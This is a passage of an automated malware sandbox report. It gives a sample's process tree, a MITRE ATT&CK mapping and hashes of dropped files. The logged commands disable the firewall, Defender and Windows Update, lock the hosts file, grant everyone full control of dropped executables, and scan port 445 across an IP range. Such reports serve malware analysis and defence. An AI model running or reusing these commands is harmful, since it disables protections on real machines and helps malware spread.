-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:1304
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:2852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:376
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2292
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2280
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:2104
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:1728
-
-
-
C:\Windows\TEMP\yvpqryzbb\teqnffvbl.exeC:\Windows\TEMP\yvpqryzbb\teqnffvbl.exe -accepteula -mp 920 C:\Windows\TEMP\yvpqryzbb\920.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:584
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:784
-
-
C:\Windows\TEMP\yvpqryzbb\teqnffvbl.exeC:\Windows\TEMP\yvpqryzbb\teqnffvbl.exe -accepteula -mp 1120 C:\Windows\TEMP\yvpqryzbb\1120.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\Windows\TEMP\yvpqryzbb\teqnffvbl.exeC:\Windows\TEMP\yvpqryzbb\teqnffvbl.exe -accepteula -mp 1176 C:\Windows\TEMP\yvpqryzbb\1176.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\TEMP\yvpqryzbb\teqnffvbl.exeC:\Windows\TEMP\yvpqryzbb\teqnffvbl.exe -accepteula -mp 2944 C:\Windows\TEMP\yvpqryzbb\2944.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\TEMP\yvpqryzbb\teqnffvbl.exeC:\Windows\TEMP\yvpqryzbb\teqnffvbl.exe -accepteula -mp 2368 C:\Windows\TEMP\yvpqryzbb\2368.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\yvpqryzbb\qedqqjtfy\scan.bat2⤵
- Loads dropped DLL
PID:2412 -
C:\Windows\yvpqryzbb\qedqqjtfy\pywtbzgyt.exepywtbzgyt.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:1440
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:956
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1996
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3536
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3016
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
C:\Windows\SysWOW64\rifzsk.exeC:\Windows\SysWOW64\rifzsk.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:2476
-
C:\Windows\system32\taskeng.exetaskeng.exe {E82A7215-BC71-4CD1-86B5-4ECC0B7758BB} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1776
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bezsyzlb\arblnql.exe /p everyone:F2⤵PID:2352
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2680
-
-
C:\Windows\system32\cacls.execacls C:\Windows\bezsyzlb\arblnql.exe /p everyone:F3⤵PID:2540
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\arblnql.exe2⤵PID:1196
-
C:\Windows\ime\arblnql.exeC:\Windows\ime\arblnql.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2708
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tbhykjnbb\pbjnmw.exe /p everyone:F2⤵PID:2556
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2860
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\tbhykjnbb\pbjnmw.exe /p everyone:F3⤵PID:1540
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bezsyzlb\arblnql.exe /p everyone:F2⤵PID:3972
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2860
-
-
C:\Windows\system32\cacls.execacls C:\Windows\bezsyzlb\arblnql.exe /p everyone:F3⤵PID:1492
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\arblnql.exe2⤵PID:3996
-
C:\Windows\ime\arblnql.exeC:\Windows\ime\arblnql.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:3760
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\tbhykjnbb\pbjnmw.exe /p everyone:F2⤵PID:3820
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1792
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\tbhykjnbb\pbjnmw.exe /p everyone:F3⤵PID:3316
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:2864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:3656
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
1.4MB
MD59909aae1a4d76ada71a40bd970888097
SHA171621fc7736ecb9aeed06784306f624457011ba7
SHA256429537695500e689f7152324a09a3af6703f31306fef8ca789682d27b82bf9a7
SHA512a8401fffb185bc91980f7df97150b9a8968d46503a1b01fcaa72c756c8200dfe7fa318c6addb01c44b35e78d32bf017643c37165422231e07289445044a15f3d
-
Filesize
1.3MB
MD569755d7215746b1a1f0956bbc0af3202
SHA1e78b56d590674c9c650ffa1028bc8e8611c963fa
SHA25654ad501893028e5f4d59b5016dcf5304a2cde3468d7952e012c43e15d9a2f8e4
SHA5128d7a8227d97d17fcb541a6fb69a1db97f7da76e8f5eee61a2ab1c9e2c46f3311ed125da66e176dc510d7ebf604c9ad9cdd68bc2a40d4c912e305adeba02e208b
-
Filesize
851KB
MD5c33d47a440d2accb0141290b42b10d60
SHA192ce6f14a85684e668c24dd8dcb1691a16f34b7e
SHA256fa80304c25ddb8c8ce638993e173f84bee8bb3a05d333c316cbe466328613aa6
SHA512a35ef4e74cf9819b396e9735cedb3f0376c6e28af267dfcd63f1459398a6bb33fb36412be68dd0d83d502a02604fd3fccbe387da5d609984be40ef50262fea8e
-
Filesize
7.2MB
MD5bd30f6754f38c79ce8ae0b21f7b3c785
SHA19e436f4738e29a12b17cfce080c3dd08a68b5f9a
SHA25608a29f90bd0b0a06a90e4243ea6a3a6193bba29c05f5f73868bd074eee0b22a0
SHA512fd76c9ece232a9d66d01e57e472f7f45300d5e1fd29a47812eeff875269e0a3c8b2ee046bee69d6088b72cb174b7f41f5597323f4da63cdd4f1749710624bfdd
-
Filesize
4.5MB
MD5164a766a3d8887befe8dba8476fce1ac
SHA1ab0bac754a294391b1acc73b874960bcc604378b
SHA256feefa6d5c5dc3f10dc0362b9d16e4259638e34e736b6e401a9eba4f1d91e5b43
SHA512fc156fd9de27e08ebde135c19fa5c6a65760e5aa7847df844d5375ab53582aff25801558ff58496d7e353b9f32035ed8ee8ef4c5637b01f6b193c7c8b85b5313
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
975B
MD5b5d815ff5310f62de5020591be598bc0
SHA18013562b0cc2516d16d474308c8982a31b7f5dd0
SHA256a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85
SHA5124e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94
-
Filesize
189B
MD53eaea60fa08c364e84e6ab1de28cd07c
SHA1414492616d4e6e09d75ff5221ef78ccb275fe1f2
SHA256c1e280c09697e6c1b6dceee03abf67d88708cfb938426cc50a3545282031bf27
SHA51220b993d4f774b84412860388c3c15d28efa81bfdbb97e4885cd0fdf093e0fb815a44d40f791dc3499cc5f097ca3bdb540928431f270934c58e266dac04e709a7
-
Filesize
159B
MD5c5ea267fc3df5859131fe1f18d7438ff
SHA12cfbfaf2c92fecb50d838a09f69b955c9d5eb950
SHA25664abc3cade83c0435948d1ba97d9863c9d12f4d30bdbd840a88220618db2614a
SHA5123354c3ed0ed69cfa00a315e294248bf2c0431ab4bb2437f7f6dec322d162e2c4da10b02ab6228d6114f2efbbd5cbac98a3486bb9c5ed09e9cb111b411e4dcac6
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
7.7MB
MD583c0210c6fe52722ec1cc28f1fffb97f
SHA17b64611241f2a4899235e7ad0cef8c08c34eeb9b
SHA256f1830dacca0efadf8f18ec974a60902b2492a0e5b0f2f34830810f4eb27a6c20
SHA512f83c57ee6e165926c60edfabca9d22f108d66bba8b4ef93543f4d2e3eced52100906d471b8668246e9d542809c8135df294b156b78634f4710757389622421c9
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
63KB
MD5821ea58e3e9b6539ff0affd40e59f962
SHA1635a301d847f3a2e85f21f7ee12add7692873569
SHA256a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb
SHA5120d08235781b81ff9e0a75f0e220a8d368d95ee75bf482670e83696e59d991aad68310ae7fa677ac96ffad1f97b3ec7d7208dc26d2edb111c39213b32502b82f6